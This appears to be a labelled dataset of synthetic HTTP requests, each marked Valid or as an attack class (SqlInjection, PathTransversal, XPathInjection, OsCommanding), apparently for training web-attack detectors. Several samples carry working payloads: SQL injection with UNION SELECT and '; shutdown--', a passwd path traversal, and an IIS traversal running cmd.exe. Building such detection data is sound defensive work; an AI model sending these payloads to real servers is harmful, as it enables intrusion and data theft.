Proxy-Authorization: Basic NmFmRWlRcDplN2FXaHR1
Authorization: Digest username="bswok"
Range: 89576-1500,-52603
Referer: /Dith/koeon/1vp6tboe.tiff
TE: trailers,chunked,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.6 (compatible; asanrfebcs; Windows NT; tsiedooyea; d0notEM)
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 576x577
Via: FTP/1.7 92.133.199.36, 1.8 188.112.156.184, 4.6 156.15.238.186
Transfer-Encoding: gzip
Upgrade: 4agtmH/1.6, n1htee/7.1, piys/1.3, atLsg/8.3
Warning: 315 www.7t2c.htm "acofigut9hd4pPtttlg" "Fri, 28 Oct 05 06:13:23 GMT"
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 170241372913166600
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~

aoyRtcuio0reL=eel5hsEyf&includemPg=2361934&bNroYi9amod=dV&nn2udy2o=86719010

End - Id: 34446
Start - Id: 26797
class: Valid
GET /uE/fnc@JE/toetera9fatfuiatcihs/.o6DEVo1dPncn/sZG0/odrhd8f73aboiz/hy.swf?ihmot6saohxna7=hsswaeht&lnax5r=ubnpasswdrr&eyhiuza=cianbhkcy HTTP/1.0
Host: www.r8cnric.uk
Connection: eeri82
Accept: image/*, image/*;q=0.5
Accept-Charset: x-mac-arabic;q=0.1, x-mac-arabic, x-mac-chinesesimp;q=0.9, isiri-3342, cp-950;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-stale=6244
Client-ip: 41.148.162.64
Cookie: 9phpDbmLQ0dJV=9872;sWsi7ug=i0wiLUon7i;linksbyM= u~copyfnl|eunionnYeai'Te;ypvKo--ACA=Aeawnrpdyhsn
Cookie2: $Version="143"
Date: Wed, 25 Jul 07 07:02:58 GMT
ETag: W/"-bmXS9aTrVk3rN0XBmoY"
Expect: Wrsat=enelIl
From: kEqlnim@ntnj.ch
If-Modified-Since: Mon, 31 Dec 07 18:47:35 GMT
If-Unmodified-Since: Mon, 10 Jan 05 11:06:42 CET
If-Match: "upgAFa6mV-Kk4-teMuR"
If-None-Match: *
If-Range: Fri, 22 Oct 04 08:11:55 GMT
Max-Forwards: 9276
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=http://dilak.net/sazsrhrt.gif
Range: 09-115498
Referer: /Ta6a.pdf
TE: deflate;q=0.4,trailers,chunked
Trailer: Host
User-Agent: Mozilla/1.4 (X11; U; Linux i386 4.9; em-oo; rv:5.5.6) Gecko/06487039
UA-CPU: StrongARM
UA-Disp: 8290,106,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3935x4964
Via: 5.0 222.60.67.255, HTTP/2.8 32.210.68.24, 7.5 www.j6O7p.shtml:4531
Transfer-Encoding: titeur
Upgrade: coar/9.8
Warning: 269 www.i6Whrlab.tiff:1 "5pHj" 
X-Forwarded-For: 63.148.52.222
X-Serial-Number: 51104
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26797
Start - Id: 41638
class: SqlInjection
GET /rmQd17_HBaDCp.htm?paunhuihnhia=seAjHkF&eaotaee7rt=971&eatee=7ptahlosa&uoietnerWnurace=le&2est=or+0%3C%3E%28select+count%28*%29++++from++fmm%29&rSrdmrre=sc14uuh-BK&sm=0922450&usAt0wu8eGirqvl=876539&RGczCxgfeowy=no2-rE%26i+%7EqrNenph-window.openui%3Bservices HTTP/1.0
Host: 214.196.209.43
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, gzip, gzip;q=0.2
Accept-Language: oete-o, i-e;q=0.0
Cache-Control: 3=eaRnOnah
Client-ip: 250.22.146.196
Cookie: e5rtapon=9710404
Cookie2: $Version="7"
Date: Wed, 29 Oct 08 02:54:43 GMT
ETag: W/"hmTxEJ5FkJRToMJo."
Expect: 100-continue
From: Ngbe0@ieOneutQWl.com
If-Modified-Since: Mon, 14 Dec 09 06:24:53 UTC
If-Unmodified-Since: Thu, 12 Apr 07 15:53:26 CET
If-Match: "YfyF@F3US0_N7MgD5oI"
If-None-Match: "@@0ePc4vYQG8BPHB"
If-Range: Sun, 04 Sep 05 20:15:18 UTC
Max-Forwards: 0
MIME-Version: 5.2
Pragma: n3husvoA='rp'
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: NTLM M2FlaG93aWx5Y2Vqbm90dGVlaWNlbndhcHBvaXZzdVJhc2NmYnlhYQ==
Range: -11289
Referer: http://Nce4l.gov/oirwsnk/4i1deP.asp
TE: deflate
Trailer: Upgrade
User-Agent: dneclRe (e4tPtCE_UO; sTdX_K10x; 45dExviZ8; eZsxCeHk)
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: HTTP/9.4 www.OgryiNel.png:3
Transfer-Encoding: gzip
Upgrade: liaory/2.2, awo4ag/4.5, oil/7.5, ctOl/2.3, see/4.6
Warning: 419 www.riae.jpeg "t4xtspnneyygypw1bdf" "Thu, 20 Aug 09 21:25:22 GMT"
X-Forwarded-For: 239.30.161.125
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41638
Start - Id: 35220
class: SqlInjection
GET /at7DTy64v/czQS./l58Fk_/7L1iA6prnsrdvag/ezZel5FrXrUCkLe/te5hagimrpoodyaEh/er/ck/WJI.nsf?shqive=%3Cuil+ldei9gR&Iee86dt=bdimg&wu7nosia=%27+%29+++UNION+ALL++SELECT++++1+FROM+Hmtloh0++WHERE+%28+++%27%27+%3D++%27 HTTP/1.0
Host: www.ub8nloier.ch
Connection: ethcxu
Accept: video/*;q=0.6, text/html, audio/x-wav
Accept-Charset: iso-8859-3, macintosh, x-mac-turkish, isiri-3342;q=0.4, windows-1252
Accept-Encoding: *;q=0.3
Accept-Language: 4-a, y12aONt-4Oteic;q=0.3, Ehts-do8, mtPh4rid-attbsdi4, 79aeuhat-seni
Cache-Control: only-if-cached
Client-ip: 245.178.189.228
Cookie: ne9oe=oFif0j
Cookie2: $Version="67"
Date: Thu, 14 Aug 08 11:07:56 CET
ETag: W/"WklUYoZI5kHc-oJWcpL"
Expect: dsSr=Keec;ibhiddns=fentrb
From: oeeetot@ecjsbsx.org
If-Modified-Since: Wed, 17 Jun 09 19:20:54 CET
If-Unmodified-Since: Mon, 07 Jul 08 12:22:23 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 857
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: alkiR qetet=eoDage
Authorization: Basic MWdNbmVuaWI6aHRpb2U=
Range: -2,109-7
Referer: http://www.haiCty.net/nosaslie/thrwpws/w2qeiih.css
TE: chunked
Trailer: Accept-Language
User-Agent: 323Hsusg2eeCwlr
UA-CPU: Sparc
UA-Disp: 3369,6494,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0990x1742
Via: e198t4/2.1 www.nrscim6.shtml, 8.9 www.ftee.gif, eoo/4.5 204.197.210.110
Transfer-Encoding: compress
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35220
Start - Id: 42039
class: SqlInjection
GET /o8heZh_Vq0SMQjAyvu7/.jWI/aitmcu.mspx?s1mV_=%27%3B+shutdown--&niiee=eMehoa8s0binur4TeNnok&J8-EUxtermF=+sCb%3C HTTP/1.0
Host: www.nraf.it
Connection: n7ee0tt
Accept: image/png
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.6, identity, compress;q=0.5, compress
Accept-Language: osoghsaa-mdc;q=0.8, ndrnhern-gn;q=0.8, a-ee;q=0.7, uhbotoOi-al, ONn-6
Cache-Control: only-if-cached
Client-ip: 80.172.139.192
Cookie: wqhe8y1tf=awp-d<
Cookie2: $Version="633"
Date: Sun, 04 Nov 07 11:46:21 GMT
ETag: "_N1zf0lhG2wuFUyPI7"
Expect: htuts=nr7wu2he
From: idgece0c@Iierx.org
If-Modified-Since: Thu, 30 Jun 05 19:50:11 GMT
If-Unmodified-Since: Sat, 31 Oct 09 09:42:19 GMT
If-Match: *
If-None-Match: "kJ40R0p6FP.xEpZ"
If-Range: *
Max-Forwards: 632
MIME-Version: 0.5
Pragma: 5yotmsa4='d2aioi'
Proxy-Authorization: 5heq iYitkt=3sapN
Authorization: 2ru2 aAiEm=3ginrn
Range: -69
Referer: http://www.cbp4ymd.biz/7mitnFeb/ehil.asp
TE: trailers,trailers
Trailer: Accept
User-Agent: olh7ostmie7hnreig
UA-CPU: MIPS
UA-Disp: 7502,392,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 422x9399
Via: HTTP/7.4 148.27.16.62
Transfer-Encoding: gzip
Upgrade: hUrier/3.1, imsa/1.4, hntw/4.9
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 3520691491140757
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42039
Start - Id: 7206
class: Valid
PUT /kAvE2L.O@/tl@.jpg? HTTP/1.1
Content-Length: 112
Content-Language: ne8pieeh,v,m3oe
Content-Encoding: gzip
Content-Location: /aryneef0.doc
Content-MD5: aGFlb2xwdGthcndlcmJjaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Dec 06 12:07:46 UTC
Last-Modified: Sun, 25 Jul 04 01:38:57 CET
Host: 50.76.4.62
Connection: sato1
Accept: image/*;q=0.5
Accept-Charset: windows-1255;q=0.9, x-mac-ce;q=0.6, euc-jp
Accept-Encoding: 
Accept-Language: xfs-y;q=0.1, aNHs-htaet;q=0.1
Cache-Control: max-stale
Client-ip: 255.188.160.16
Cookie: eaja=sF.9Aeh2r9M;acceptgI3E3oMrcp=rr7eljcu8h
Cookie2: $Version="570"
Date: Tue, 09 Aug 05 16:09:36 UTC
ETag: W/"rn6sybHKNVxYy6EGGhl"
Expect: 100-continue
From: eklcds@EusetgdssJ.biz
If-Modified-Since: Wed, 21 Apr 10 14:47:56 UTC
If-Unmodified-Since: Sun, 07 Mar 10 17:21:51 UTC
If-Match: "FdcEzvVFTT6YEHVlbLR9"
If-None-Match: "0oRJZOwg46uSF4_tGm"
If-Range: "hyLM-f92oYh2LpZE8g9"
Max-Forwards: 63
MIME-Version: 7.1
Pragma: pr=to5o0e6
Proxy-Authorization: Digest nc=9f15Ac7e
Authorization: NTLM aG5uaUFvaHU3YW9kbmFhdXNlcmhvbFV0Y2RjdW5yZ3RUc2EzYm1ycjdzYVl0MmY=
Range: 835-,-3,7-0
Referer: http://hsobu.org/ninnip/oub3lmP.cgi
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.4 (Windows; U; Windows NT 1.8; u3-er; rv:3.0.3) Gecko/47820339
UA-CPU: MIPS
UA-Disp: 5578,6674,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 629x010
Via: 0eam/2.9 174.159.144.90, 8.4 167.54.62.207:6
Transfer-Encoding: x73oar
Upgrade: nctee/4.4, seyc/3.3, leTnv/8.7
Warning: 892 www.oeiareeu.shtml "skEl0E" "Sun, 11 Jul 04 16:54:27 UTC"
X-Forwarded-For: 62.39.133.239
X-Serial-Number: 741957676224840602
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

it1YYLhmdopeno=R2tisteenjnachildn&gallCY.E=a~f&htsumassm14l=ofksyswab&weuu9aor=zyrrrrusin8appx&mrn7=1775865792

End - Id: 7206
Start - Id: 6691
class: Valid
POST /eU_hAGp/rbenr8ehan/tFm.png? HTTP/1.1
Content-Length: 34
Content-Language: Ri,saerdT,Ihykll
Content-Encoding: deflate
Content-Location: http://s9hoqtwd.org/avti.php
Content-MD5: bXNOaGVsejhsZWVvdHNkbg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Oct 07 19:41:18 UTC
Last-Modified: Mon, 02 Apr 07 09:06:43 GMT
Host: 216.20.26.30
Connection: dwpNa1a1
Accept: image/jpeg;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: fwlruto-whdfYrmw;q=0.1, eA-wdatStt;q=0.4, invt-tqie
Cache-Control: no-transform
Client-ip: 132.102.143.2
Cookie: 3dAw=628;Annur3csoltpyo=9280625;lsa35adesT=@M|1B2 o=oI;1eeexmlE1;KnPOuXu=ant;asio=80731
Cookie2: $Version="648"
Date: Wed, 24 Jan 07 09:34:31 CET
ETag: "aUAEYweAIy_FKSmYU"
Expect: odtyie
From: t8ii5lo@ebsu.be
If-Modified-Since: Tue, 07 Nov 06 23:25:26 UTC
If-Unmodified-Since: Sat, 01 Oct 05 16:28:21 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 02 Feb 05 24:01:54 UTC
Max-Forwards: 9
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: rToroR shwsInE=lwodlt
Range: 954790-0,-841813,-6
Referer: /nc7nny/e6p5px/ttsoEbe/M4imaH/kdeeexon.jpg
TE: deflate;q=0.8,trailers
Trailer: Accept-Charset
User-Agent: tkthnho/3.3.0.4
UA-CPU: x86
UA-Disp: 8391,040,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 075x397
Via: 5.3 www.3isu.htm, re6oE3/0.3 www.atre7e.png, HTTP/2.2 www.rea9woin.js
Transfer-Encoding: identity
Upgrade: hrutt/6.0, tbuzs/0.5, iar/0.3, u7e4ae/3.3
Warning: 435 2.165.17.143:840 "omshwmst1" "Wed, 09 Nov 05 13:34:42 UTC"
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 688311326706532
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.ZCVuD=53792543&qc08u-YZs-A=0w6uss

End - Id: 6691
Start - Id: 44894
class: PathTransversal
GET /zasaiejgW0dNhl4/WxiqAjd7K1bYQ/2kb4c/yaH.shtml?slshrtzo=ooitxp_uU&oZKr5open=37037141&teai=teaI&eetnI3de=82319432&H.j9group by=e5nLlk0CX&xreplaceoptadminKxGprocessing-instructionLycT=037&nellTrgom7=file%3A%2F%2F%2F6%3A%2FtruRy%2Fvm%2FFn1nMs.xml&3tuag9eN0n=w10GeN3&nctchl3ceJ=E%2F+lle&dninsf6=bn+&tlk=n&OAC4t=10&Eg8siissaa=19 HTTP/1.1
Host: www.ueahtl.it
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-1, x-mac-roman;q=0.3, iso-8859-4;q=0.4, x-mac-japanese, iso-8859-15;q=0.7
Accept-Encoding: compress;q=0.1, gzip;q=0.2
Accept-Language: u3susm-oxlE
Cache-Control: max-stale
Client-ip: 45.33.101.245
Cookie: aeeytni3ciUrae=bUaeEilxsteheei
Cookie2: $Version="65"
Date: Sun, 07 Mar 04 23:42:28 CET
ETag: W/"tIHhbmSuiGV1mULHe7Fs"
Expect: eaqhh8
From: ahayEf@doo7.de
If-Modified-Since: Tue, 13 May 08 08:39:40 CET
If-Unmodified-Since: Sat, 05 Nov 05 08:41:55 UTC
If-Match: "xfr0m9LgbXI5Dye"
If-None-Match: "U8pArl3Dh-qGpG8b5-U"
If-Range: *
Max-Forwards: 8
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: NTLM ZG93bmRvZXJzaWN0ZUx0ZVRlMGtvZUw1cmFzZWVmcHQ4SDcw
Range: -129
Referer: /fryMocr/o3uew/ieaRoa7/sdhs4wto.bin
TE: trailers,chunked
Trailer: Warning
User-Agent: 1sonss/6.2.2.8
UA-CPU: x86
UA-Disp: 7572,678,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6797x3315
Via: FTP/3.6 www.smxsHw.jpeg:54
Transfer-Encoding: identity
Upgrade: yr2s/6.7
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44894
Start - Id: 49740
class: XPathInjection
GET /ahdoiuuIi2edmsnt/n9zJocKuSc3.html?kF6bA=bdall9tobjectea%3C&replace6l5=41++or++sels2n%2FsEstl%2Fib%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D379%5D+++++or++62217%3D&CNospk6bI1uT=74&qRqAM_id=e&55CZ_al.F0a=14449101&nph-Ogstmp_=174594&htniueiui3ttu=nl-oITUM&epkeaeaDKdkllo=lflsn3z+s%3Bj+e%3F+im+e&dxaptirnCoem=s4eS&twn=7&gteshri=9704298176&ssp=elea3eeR5&sa0=rA1UwPd4VjB&afAotsn2AriaErA=awlXYZq&rhi54aMbus7es=8zw0%2FhfgthmCreplacehl%7E HTTP/1.1
Host: www.tinoenr.ch
Connection: close
Accept: image/gif;q=0.7
Accept-Charset: iso-8859-7, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: senc-5eu4lc1, yeccmlal-Rsa;q=0.4
Cache-Control: no-transform
Client-ip: 24.134.122.55
Cookie: eeit8n=rood;cc=snBp2P6G;earatf=jJu;Nd=fxreplacehedlnadaotnea;XlERq=7AAe0az60s
Cookie2: $Version="05"
Date: Fri, 04 Nov 05 21:11:44 CET
ETag: "-Dc1ZeBRZlf3FwUe"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 25 Jul 04 06:35:32 GMT
If-Unmodified-Since: Mon, 17 Sep 07 19:33:54 CET
If-Match: "d8k9HmJhr--sF05v9"
If-None-Match: "wAv25j7KRVyzLhge"
If-Range: "l8UmGJBfikP0i.2"
Max-Forwards: 4
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic aXd5RWRhbmE6OHFuOGVuNGU=
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -1702
Referer: /bacH/gayw/wwSmiiDa/snmltmH.png
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: Mozilla/7.4 (Windows; U; WinNT 0.2; 8e-ed; rv:3.6.6) Gecko/75544063
UA-CPU: x86
UA-Disp: 3953,5444,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4005x8626
Via: 8.9 www.r1oO.html:9630, FTP/0.6 169.37.150.117:903, 0.9 www.dulcobw8.htm:446
Transfer-Encoding: deflate
Upgrade: rsmt7a/2.2, ysy/1.0
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49740
Start - Id: 5072
class: Valid
PUT /uw9AOfdn2/pdcP7Hkd4_qE1V.Qy-t/rA/e2reietenechs0mI/MzZnDUrmzRpPiQG2/potz85oivha3nsHsld/4TwGO6VB8gAj-/Xz8/3bYDh@/uar5lt3at6rlklAosdi7/BOmS5YW.shtml? HTTP/1.1
Content-Length: 150
Content-Language: h
Content-Encoding: deflate
Content-Location: http://Hmrv.fr/ndih/bnmaie/soia5hte.nsf
Content-MD5: dHRjYXN5bHJjOWV5c2VpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 11 Apr 05 23:17:53 GMT
Last-Modified: Thu, 08 Apr 04 03:30:13 UTC
Host: 77.13.243.185
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1258
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 106.166.141.117
Cookie: b0rjW0yPN_=3;ate4=rms;ttlrmxHHrOt=s;8blrenptpgqIer=wf:ts
Cookie2: $Version="801"
Date: Mon, 04 Dec 06 14:41:44 CET
ETag: "ysQeb7HLdpYvo.M2T"
Expect: 100-continue
From: rbDpahs@ipSonalu.biz
If-Modified-Since: Fri, 18 Jan 08 08:13:52 CET
If-Unmodified-Since: Tue, 06 Jun 06 02:22:53 UTC
If-Match: "RgJzxiW8uXsn.bCjI"
If-None-Match: "Z3zpJizC0k65McRw"
If-Range: *
Max-Forwards: 77
MIME-Version: 3.6
Pragma: o9a=ntoiTss
Proxy-Authorization: NTLM dGN1YXVmdXRpRWljaG5ydDNvdHZpZThzdGFCdGhuZXU=
Authorization: Basic aVMydGFoZTplaXBTZXU=
Range: 818-,7964-381
Referer: http://sibe7dt.ch/neerfr/esRtwo.gif
TE: trailers,gzip;q=0.7
Trailer: Host
User-Agent: Mozilla/4.6 (X11; U; Linux i586 3.3; ai-in; rv:8.2.8) Gecko/18834918
UA-CPU: PowerPC
UA-Disp: 925,165,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 7508x091
Via: rrmelO/5.5 176.137.76.89:45077
Transfer-Encoding: gzip
Upgrade: fnget0/9.0, Hrn/8.2
Warning: 467 150.166.100.47 "uemut595tnsdte" "Mon, 06 Dec 04 06:40:13 GMT"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 100173301629912
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lImlaumne=3&dirmaalttg=12&rgz0l=7115012&tyhat0=ne4seron4'2rrmw&seto9eSwrtIdss=9545&innW=i:trAoFtpseda hblP&dEd=3440&ousyooeenngIfl=rumh&eetm=38281

End - Id: 5072
Start - Id: 46352
class: PathTransversal
GET /ersvghp5BamAtmreeia/ereonyoedGyt/o5Hi/g-ftp28P_orrR/1RUK8XRgwPfo-g78@/nXCqf6IcQs/Teyarwshieebialt/mvw0lhspnlsra/aRyogreM9s.bin?Wd5KY9nAg=sesAe0seo%24netcat&iwoopedE8bemtPi=sQAFVOTUTs&Mhttpswgetu7perl=8&zn72g=t1a&nsNisfainio9=%2F%2C%2C%2C%2Fnxaaua%2Flbhete%2Fpasswd&enylgotoAadooim=m3dlBrim-t&2erm=t6Sv&bmfVd9=t6S&aeoy6ilwAw=euYaPPOdqw%40Y&rile9ovjamf=o9iUQ&knAE4v6tqhoite6=mochamsexec&nentrn7snfxi=%26wLvg&ed.WBFOUR=rttrdvcNb4enu53thm&nnp=0143 HTTP/1.1
Host: www.YtgaeaA.uk
Connection: keep-alive
Accept: application/*, text/*;q=0.4, video/mpeg;q=0.8
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, identity;q=0.5
Accept-Language: Einn-5eeg
Cache-Control: max-age=0655
Client-ip: 19.56.40.179
Cookie: rhbet=nl(;hr=leuisnVema ?;occ=3E;1bqdriyA=t<;httpsRnc56.Jls=lbenMrteac
Cookie2: $Version="19"
Date: Sun, 05 Feb 06 24:53:18 UTC
ETag: W/"iS.lsM4a5lrac@V_Cu"
Expect: bauo=lhaTieto;ehcfnbls=tfuo2
From: dB62@isuoongs1.org
If-Modified-Since: Thu, 15 Jun 06 11:09:37 UTC
If-Unmodified-Since: Fri, 13 May 05 11:17:25 UTC
If-Match: "Aw1QgKMgfJRrHaYSr0a"
If-None-Match: "rKUAANKDBvP73oT"
If-Range: *
Max-Forwards: 1515
MIME-Version: 6.8
Pragma: hbntrc='i'
Authorization: Digest algorithm=MD5-sess
Referer: http://www.rieetd.be/naauay/eehA.jpg
TE: chunked,trailers,chunked
Trailer: Authorization
User-Agent: Mozilla/8.2 (Machintosh; U; PPC Mac OS X 3.7; tV-en; rv:5.0.3) Gecko/89310200
UA-CPU: StrongARM
UA-Pixels: 648x2225
Via: FTP/7.4 www.tstt54s4.htm:607, FTP/4.5 100.143.228.214, 6.9 www.adUe.js
Transfer-Encoding: deflate
Warning: 915 23.102.86.169 "8rrnetn" 
X-Forwarded-For: 67.104.67.27
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46352
Start - Id: 42783
class: SqlInjection
POST /e7X/vov2t/naeFcten1/rAl31wfC0wmf/ea1/eogeefteeeIedc/oZoHbPJlGk_8nCHyy.mdb? HTTP/1.0
Content-Length: 156
Content-Language: 3rt,wrndhT,eece
Content-Encoding: deflate
Content-MD5: aDF0dGk0ZHRkWE9IemVzcw==
Content-Type: application/x-www-form-urlencoded
Host: www.noeasdf.fr
Connection: close
Accept: audio/*;q=0.5, text/xml, application/postscript;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 62.36.167.216
Cookie: Tvfsl=;   exec get_cust('x'' union  select     object_name,object_type,''x'' from    user_objects   where ''hdb19klu''    =    ''    '  );;rmEt=ao aimwyhasrnEs;jA0ENsha1ic=989267;hzxqnleetsei5gr=rULHxB;gtrlhlhYroeba==istdinor
Date: Sat, 17 Feb 07 07:11:34 CET
Expect: inoo=eim1ra;appii=zUlwotO
From: aifpploa@tlrC5ena.de
If-Unmodified-Since: Tue, 22 Sep 09 23:34:49 UTC
If-Range: *
Max-Forwards: 6
Pragma: no-cache
Authorization: aiyh rya6trf=eaeicer
Referer: /6itse.php4
Trailer: Expect
User-Agent: ruAtxcin5dheian
Transfer-Encoding: htuozh
Upgrade: doh/4.6, sv4t/6.6
X-Serial-Number: 2167956
----: --------------------------

cPsam5=Nz8&ilar=a;fom%u&tm=02018&0aidKnph-=ien&abhtr=6198&R4a8wrcA84hi=mbltYuc&Nasor1in= eg &fbat=d5olB5cWhe8tstylerls&ortzlrdebthc=from&eital=eupdatemr

End - Id: 42783
Start - Id: 43878
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.fnotieCam.uk
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=19
Client-ip: 184.162.182.17
Cookie: d-lbXcF.=11436
Cookie2: $Version="4"
Date: Sat, 14 May 05 15:15:46 GMT
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: 100-continue
From: 2bgyahe@ty1w.biz
If-Modified-Since: Fri, 02 Oct 09 24:22:14 UTC
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: *
If-None-Match: "o80Br3oYw_Toit0ij@"
If-Range: Thu, 17 Jan 08 19:30:39 CET
Max-Forwards: 7752
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: NTLM bzlTcm52eXZvZ2FlaWxmSHdhb2N5c2llbnQ0TGkzUnQ=
Range: 40517-,9-9675
Referer: http://nicdmnro.uk/hcp7Ct7t.jsp
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: hjrDELE http://www.saivf.ch
UA-CPU: Sparc
UA-Disp: 708,9864,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: FTP/4.6 www.Euuyn.tiff, hgtot5/2.0 31.213.183.2, agmfan/5.2 136.43.101.187
Transfer-Encoding: deflate
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 631 234.108.10.201:870 "l05cl4bnf" "Sat, 24 Jan 04 23:46:55 UTC"
X-Forwarded-For: 160.49.9.9
X-Serial-Number: 983467996985112
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43878
Start - Id: 27499
class: Valid
GET /sUEBrsZZoneJzvJ/locationN/kAlWRHHsjK6ELObKH/tsfcs.dll?nzezeaQestl=7qtduniongbdlotNf4ecad&eRbnerene=usy5ethutd&Y6=807250&saatR=9&etCiooos=7&g8X0access_log=eRn&odswNholoeeyyoe=aRQi&dHv=2&s2nlknooo=q&foESdeu=eW%7C&oi5hSelPigc=auetoswjpanRp0%3BS%28+ihome HTTP/1.0
Host: www.c7wbaiaea.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 118.157.88.93
Cookie: otzngtm7fpnbN=46;cotioe0tse1pt=r_iRHT;MktMc4xnetcat7_A=hniut;2gpe6I5=7193;aeSodmx2ts0m=ulOEn
Cookie2: $Version="226"
Date: Thu, 22 Jul 04 08:02:25 UTC
ETag: W/"tUDmNcX.Xyn7WnSkD"
Expect: hs1S=hCtn;faul
From: riesdt@ihbbmnslTg.net
If-Modified-Since: Sat, 30 Oct 04 08:52:28 GMT
If-Unmodified-Since: Tue, 10 Feb 09 20:32:26 UTC
If-Match: "ChjBk99hCL.5OimUNjcj"
If-None-Match: *
If-Range: "PSgDKBEQSAE@cBJO"
Max-Forwards: 8431
MIME-Version: 7.0
Pragma: rto='dVoHghus'
Proxy-Authorization: Basic eWVld3BpczpzaDRzaWhvNw==
Authorization: Digest uri=http://wceCo.de/npeIc/rthnrsy/pnttf.pdf
Range: 1237-98,8233-,5148-10
Referer: http://e07s9.gov/sh1itr/dohon.exe
TE: trailers,gzip,trailers
Trailer: Range
User-Agent: dVDGYp http://www.hoSrreo.de
UA-CPU: PowerPC
UA-Disp: 436,3999,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5041x3321
Via: 9sur2/0.1 www.rhiOed.tiff
